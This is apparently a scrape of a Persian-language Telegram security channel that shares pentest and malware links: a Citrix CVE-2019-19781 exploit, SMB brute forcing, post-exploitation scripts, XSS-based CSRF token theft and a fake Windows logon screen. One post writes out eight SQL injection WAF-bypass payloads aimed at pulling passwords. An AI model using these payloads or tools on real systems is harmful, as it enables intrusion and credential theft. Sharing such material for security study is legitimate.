امنیت اطلاعات

لیست بدافزارهای اندرویدی فعال و توضیح یک خطی در مورد نحوه فعالیت هرکدام

https://forensics.spreitzenbarth.de/android-malware/

#android
#malware

@sec_nerd

444 views08:31

امنیت اطلاعات

یک نمونه از حمله علیه Citrix برای سوء استفاده از آسیب پذیری شناسه CVE-2019-19781 https://support.citrix.com/article/CTX267027 #citrix #network @sec_nerd

نقشه ی گستردگی دستگاه های آسیب پذیر #citrix در برابر CVE-2019-19781

#shodan
#cirtix

@sec_nerd

378 views08:33

امنیت اطلاعات

یعنی تا الان...

#shit
#fortinet

@sec_nerd

369 views08:37

امنیت اطلاعات

رتبه بندی کشورهای میزبان سرورهای کنترل کننده بات نت ها در سال ۲۰۱۹

(توی بیست تای اول نیستیم)

https://www.spamhaus.org/news/article/793/

#news
#botnet

@sec_nerd

386 views18:35

امنیت اطلاعات

بروت فورس SMB با ابزار SMBrute

https://github.com/m4ll0k/SMBrute

#smb
#windows
#linux
#pentest

@sec_nerd

408 views09:45

امنیت اطلاعات

مجموعه اسکریپت های مفید برای عملیات پسانفوذ

https://github.com/mubix/post-exploitation

#post_exploitation
#windows
#privesc
#lateral_movement

@sec_nerd

GitHub

GitHub - mubix/post-exploitation: Post Exploitation Collection

Post Exploitation Collection. Contribute to mubix/post-exploitation development by creating an account on GitHub.

426 viewsedited 09:49

امنیت اطلاعات

Cross-Site Websocket Hijacking bug in Facebook that leads to account takeover

https://ysamm.com/?p=363

#writeup
#facebook
#bugbounty

@sec_nerd

342 views09:59

امنیت اطلاعات

شکستن هش های Citrix Netscaler با hashcat https://github.com/hashcat/hashcat/commit/53105abeb47a6c325dee6714b1503cd68bd0c9c8 #hashcat #citrix @sec_nerd

رمزگشایی مقادیر استخراج شده از کانفیگ Citrix

https://dozer.nz/citrix-decrypt/

#citrix
#shitrix

@sec_nerd

dozer.nz

Citrix Netscaler config decryption

hacking and technology

371 views10:01

امنیت اطلاعات

هشت روش برای دور زدن WAF در حملات تزریق SQL

1.Nullbyte:
%00' UNION SELECT password FROM Users WHERE username-'tom'--

2. SQL Comments:
'/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/OM/**/Users/**/WHE/**/RE/**/usersame/**/LIKE/**/'tom'--

3. URL encoding:
%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/password%252f%252a*/FROM%252f%252a*/Users%252f%25a*/WHERE%252f%252a*/username%252f%252a*/LIKE%252f%252a*/'tom'--

4. Changing Cases:
UniOn AlL SeLeCt/*inc0gbyt3*/select/**/1,2,3,4,5 --

5. HTTP Parameter Pollution (HPP):
Regular attack SQLi hxxps://www.xxx.com/noticias.php?id=1 union select 1,2 --

HPP attack + SQLi: hxxps://www.xxx.com/noticias.php?id=1&id=*/union/*&id=*/select/*&id=*/1,2+--+

6. Replacing keywords technique
hxxps://www.xxx.com/artigos.php?id=123+UnIoN+SeLselectECT+1,2,3,4,5--

7. CRLF WAF Bypass (Carriage Return, Line Feed) - Common on (aspxasp) applications
Putting theses chars at the beggining of payload

%0A%0d+select+user+from+dual+%0A%0D

8. Buffer Overflow bypassing:
and (select 1) = (select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ..... A's)

https://incogbyte.github.io/sqli_waf_bypass/

#sqli
#WAF
#web
#pentest

@sec_nerd

592 views10:03

امنیت اطلاعات

تبدیل SQLi به RCE

https://pentestmag.com/sql-injection-to-rce/

#sqli
#rce
#web
#pentest

@sec_nerd

912 views10:09

امنیت اطلاعات

#fun

@sec_nerd

453 views19:07

امنیت اطلاعات

سرقت توکن های CSRF با استفاده از XSS

https://sametsahin.net/posts/steal-csrf-tokens-with-simple-xss/

#xss
#csrf

@sec_nerd

556 views19:08

امنیت اطلاعات

0:32

This media is not supported in your browser

VIEW IN TELEGRAM

windows firewall

#fun

@sec_nerd

466 views09:23

امنیت اطلاعات

This media is not supported in your browser

VIEW IN TELEGRAM

صفحه ی فیک لاگین ویندوز که قابلیت ترکیب با سایر ابزارها و بدافزارهای ویندوزی را دارد

زبان سی شارپ

https://github.com/bitsadmin/fakelogonscreen

#windows
#pentest
#malware
#privesc

@sec_nerd

493 views17:31

امنیت اطلاعات